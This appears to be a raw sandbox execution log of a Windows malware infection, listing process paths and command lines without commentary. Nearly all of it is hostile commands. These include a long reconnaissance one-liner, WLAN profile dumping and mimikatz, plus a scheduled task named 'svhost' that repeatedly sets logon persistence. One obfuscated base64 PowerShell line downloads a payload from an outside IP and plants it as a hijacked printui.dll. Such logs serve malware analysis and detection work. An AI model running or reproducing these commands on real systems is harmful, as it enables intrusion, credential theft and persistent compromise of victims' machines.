C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\2641813856.exe
C:\Users\Admin\AppData\Local\Temp\2641813856.exe
C:\Users\Admin\Desktop\Files\win.exe
"C:\Users\Admin\Desktop\Files\win.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\route.exe
route print
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4dCnvsGHvDiU.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\SysWOW64\arp.exe
arp -a 10.127.0.1
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Windows\system32\net.exe
net user
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Users\Admin\sysnldcvmr.exe
C:\Users\Admin\sysnldcvmr.exe
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\2755424256.exe
C:\Users\Admin\AppData\Local\Temp\2755424256.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tL6XnagKaIgV.bat" "
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\1716412561.exe
C:\Users\Admin\AppData\Local\Temp\1716412561.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7BKgyAACbrJA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\386833483.exe
C:\Users\Admin\AppData\Local\Temp\386833483.exe
C:\Users\Admin\AppData\Local\Temp\1259121635.exe
C:\Users\Admin\AppData\Local\Temp\1259121635.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CA5zFxSvwcz3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\1592010501.exe
C:\Users\Admin\AppData\Local\Temp\1592010501.exe
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KpJaritWY7Wn.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Z6r9qEeCxRa3.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aViE447TG4FZ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YyhvHPvCwEdk.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zewdvRql0rBF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XOkfOCapixH2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWV5LILmwDkB.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tqd9bvEpV0ua.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\Desktop\Files\mimikatz.exe
"C:\Users\Admin\Desktop\Files\mimikatz.exe"
C:\Users\Admin\Desktop\Files\pyl64.exe
"C:\Users\Admin\Desktop\Files\pyl64.exe"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ftw3mqLVpZtH.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yICg7Oyl7DQoJKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovLzM3LjEuMTk2LjM1L3VuMi9ib3R1aS5kYXQiLCAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIik7DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyA2MDsNCgl9DQp9')); Invoke-Expression $decoded;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[Base64 payload omitted]')); Invoke-Expression $decoded;"
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sLyrJp9hZt1l.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TvXcYRAMCmLa.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\v1MqV8zS0keO.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WED4FLMtlykw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P735ONMHFgAv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MgWZXJj8dCjb.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gNnc9t1MefMS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eWdLSNzWVWXx.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ClAP8OY0qr7E.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mnB15KcaDiYm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Gx59zxdPG3VG.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\l0sKY7ywAZNP.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C0h7HxYaBUBo.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wx6Kph6nz0Zz.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vh0wSPmbBKyc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zhedrrgYdTXc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r1Ny2AwHZby2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d0KT3AhTwW64.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ccP8MoMSkZZY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\phQRykera6C2.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\F2sRNGlhbro7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SgiXdtrMxqTA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RJf0VG3ZT1TF.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WSrXY5OEpBpo.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GSS5rvdHHUg7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HOjTmXfky7zS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
